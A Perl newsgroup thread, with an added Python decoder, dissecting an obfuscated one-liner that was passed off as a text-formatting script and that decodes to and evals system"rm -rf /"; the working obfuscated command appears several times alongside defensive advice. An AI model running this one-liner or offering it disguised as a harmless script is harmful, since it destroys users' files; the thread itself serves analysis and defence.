Perl tricks

Andrei Koulik

Can anybody explain to me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Charles DeRykus

Can anybody explain to me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


You can use Deparse to get a clearer view:

perl -MO=Deparse
$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see
^D

$?->perl ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/;
tr( -/:-@[-`{-})[`-{/"\-];
s//$_;/see;

The evil is lurking in the final double eval. Comment that
line and throw in a 'print' after preceding statements,

....
tr( -/:-@[-`{-})[`-{/"\-]; print;
#s//$_;/see;

Ah, the $_ that the double eval loads up with is:

system"rm--rf-/"

HTH,

John W. Krahn

Andrei said:
Can anybody explain to me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Just change the "s;;$_;see" at the end to "print":

$ perl -le '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;print'
system"rm -rf /"


John

David

Andrei Koulik said:
Can anybody explain to me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

translation:

$? ?
s/;s/s;;$?/
:
s//=]=>%-{<-|}<&|`{/;

tr( -/:-@[-`{-})[`-{/"\-];

s//do{
$_;
};/see;

more translation:

1. this:

$? ?
s/;s/s;;$?/
:
s//=]=>%-{<-|}<&|`{/;

essentially translates to:

$_ = '=]=>%-{<-|}<&|`{';

Look up perldoc perlvar to see what $? holds and you will know why.

2. this:

tr( -/:-@[-`{-})[`-{/"\-];

has a few components. Those between '(' and ')' are the characters to be translated:

' -/' means: all characters between the space and '/'
':-@' means: all characters between ':' and '@'
'[-`' means: all characters between '[' and '`'
'{-}' means: all characters between '{' and '}'

Those between '[' and ']' are the characters they are translated to:

'`-{' means: all characters between '`' and '{'
'/" \-' means just the literal characters.

So you are translating:

!"#$%&'()*+,-./:;<=>?@[\]^_`{|}
`abcdefghijklmnopqrstuvwxyz{/" -

characters from upper string to the lower string.

Now take what $_ holds and apply the translation; this gives $_ as:

system"rm -rf /"

3. Isn't it clear from here on?

s//do{
$_;
};/see;

'ee' basically runs the system call via do{}.

4. Question: are you going to run that to confirm what I said?

david

Jay Tilton

: Can anybody explain to me how this command deletes files:
: perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Start by running it through the Deparse backend to get rid of some
obfuscating elements, then add some whitespace for readability.

$? ? s/;s/s;;$?/
: s//=]=>%-{<-|}<&|`{/ ;

That puts the string "=]=>%-{<-|}<&|`{" into $_ .

Beyond extra obfuscation, I don't know what "s/;s/s;;$?/" could have to
do with anything--I don't know of a circumstance where $? would hold a
true value when the program starts execution.

tr ( -/:-@[-`{-})
[`-{/" \-] ;

That alters the characters in $_.
If you print it now, it will read 'system"rm -rf /"' .

s//do { $_ };/see ;

That's just a hairy way of saying "eval $_" .

So were you aware of the code's malicious nature before running it, or
did something terrible happen?
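As an added example, not part of the thread or of anyone's reply above: the hand decoding that David and Jay walk through, done statically in Python. It emulates the seed `s//.../`, expands the `y///` ranges the way Perl does (including the literal trailing `-`), and returns the string the final `s//$_;/see` would have handed to eval, without evaluating or executing anything. It assumes Perl's defaults for `perl -e`, namely `$?` being 0 and `$_` empty at start; the function and constant names are mine, not Perl's.

```python
# Added example, not from the original thread: a static emulator for the
# decoding steps in the replies above. It recovers the payload of the
# one-liner without ever letting Perl reach the final s//$_;/see.
#
# Assumptions (Perl's defaults for `perl -e`): $? is 0 when the program
# starts, and $_ is empty before the first s///. The names below are mine.

SEED = '=]=>%-{<-|}<&|`{'     # replacement text of s//=]=>%-{<-|}<&|`{/
TR_SEARCH = ' -/:-@[-`{-}'    # search list of y; -/:-@[-`{-};...
TR_REPLACE = '`-{/" -'        # ...;`-{/" -;  (the final '-' is a literal)


def expand_tr_list(spec):
    """Expand one side of a Perl tr/// into a list of single characters.

    Handles 'lo-hi' ranges on ASCII code points, backslash escapes
    ('\\-' is a literal '-'), and a '-' that is first or last in the
    list, which Perl also treats as a literal.
    """
    chars = []
    i, n = 0, len(spec)
    while i < n:
        ch = spec[i]
        if ch == '\\' and i + 1 < n:             # escaped character
            chars.append(spec[i + 1])
            i += 2
        elif i + 2 < n and spec[i + 1] == '-':   # lo-hi range
            lo, hi = ord(ch), ord(spec[i + 2])
            if lo > hi:
                raise ValueError(f'invalid range {ch}-{spec[i + 2]}')
            chars.extend(chr(c) for c in range(lo, hi + 1))
            i += 3
        else:                                    # plain literal
            chars.append(ch)
            i += 1
    return chars


def perl_tr(text, search, replace):
    """Emulate Perl's tr/SEARCH/REPLACE/ with no flags.

    Rules reproduced: a shorter REPLACE list is padded by repeating its
    last character, an empty REPLACE maps every character to itself, and
    the first mapping wins when SEARCH lists a character twice.
    """
    src = expand_tr_list(search)
    dst = expand_tr_list(replace)
    if not dst:
        dst = list(src)
    elif len(dst) < len(src):
        dst += [dst[-1]] * (len(src) - len(dst))
    table = {}
    for s_ch, d_ch in zip(src, dst):
        table.setdefault(ord(s_ch), d_ch)
    return text.translate(table)


def decode_one_liner(exit_status=0):
    """Run the first two statements of the one-liner on paper and return
    what $_ holds when the third one, s//$_;/see, would fire.

    The returned string is exactly what the 'ee' flag would have passed
    to eval; this function never evaluates or executes it.
    """
    underscore = ''                               # $_ at program start
    # Statement 1: $? ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/
    if exit_status:
        underscore = underscore.replace(';s', 's;;' + str(exit_status), 1)
    else:
        underscore = SEED + underscore            # s//X/ inserts X at offset 0
    # Statement 2: y; -/:-@[-`{-};`-{/" -;
    underscore = perl_tr(underscore, TR_SEARCH, TR_REPLACE)
    # Statement 3 (s//$_;/see) is the dangerous one; we stop before it.
    return underscore


if __name__ == '__main__':
    print('tr source list :', ''.join(expand_tr_list(TR_SEARCH)))
    print('tr target list :', ''.join(expand_tr_list(TR_REPLACE)))
    print('code that /ee would eval:', decode_one_liner())
```

Running it prints the two 32-character lists from David's table and the recovered `system"rm -rf /"`. Passing a non-zero `exit_status` exercises the other branch of the ternary: on a fresh interpreter `$_` is empty, so `s/;s/s;;$?/` matches nothing and the result is an empty string, which is consistent with Jay's remark that this branch does nothing useful. The general lesson is the same one John applied by swapping `s;;$_;see` for `print`: decode obfuscated code with a transform that cannot execute it.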

Andrei Koulik

Thanks all very much.
Yesterday I parsed it manually, the way John W. Krahn did, but from
your replies I have learnt some useful things.

Andrei Koulik

Jay Tilton wrote:
......
So were you aware of the code's malicious nature before running it, or
did something terrible happen?
I was asked to debug a script for text formatting:

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

but I noted that neither the -n nor the -p option is used, so I started
debugging it as the news user (which doesn't own any files).
But after some steps, lines:
....
rm: /usr/bin/objcopy: Permission denied
rm: /usr/bin/objdump: Permission denied
rm: /usr/bin/ranlib: Permission denied
....
were printed. When I pressed Ctrl-C the output froze, but beeping
started and the terminal didn't respond to any keys.
I didn't know what had happened, so I had to understand what this program
actually does in order to detect possible damage.

Jay Tilton

: Jay Tilton wrote:
: .....
: >
: > So were you aware of the code's malicious nature before running it, or
: > did something terrible happen?
: >
: I was asked to debug a script for text formatting:
:
: cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
:
: but I noted that neither the -n nor the -p option is used, so I started
: debugging it as the news user (which doesn't own any files).
:
: But after some steps, lines:
: ...
: rm: /usr/bin/objcopy: Permission denied
: rm: /usr/bin/objdump: Permission denied
: rm: /usr/bin/ranlib: Permission denied
: ...
: were printed. When I pressed Ctrl-C the output froze, but beeping
: started and the terminal didn't respond to any keys.
: I didn't know what had happened, so I had to understand what this program
: actually does in order to detect possible damage.

Next time you feel compelled to run a mysterious script like that, you
might want to use perl's -T switch, at the least. In this case, it
would have halted the program with an "Insecure $ENV{PATH}" error before
any mischief could begin.
 
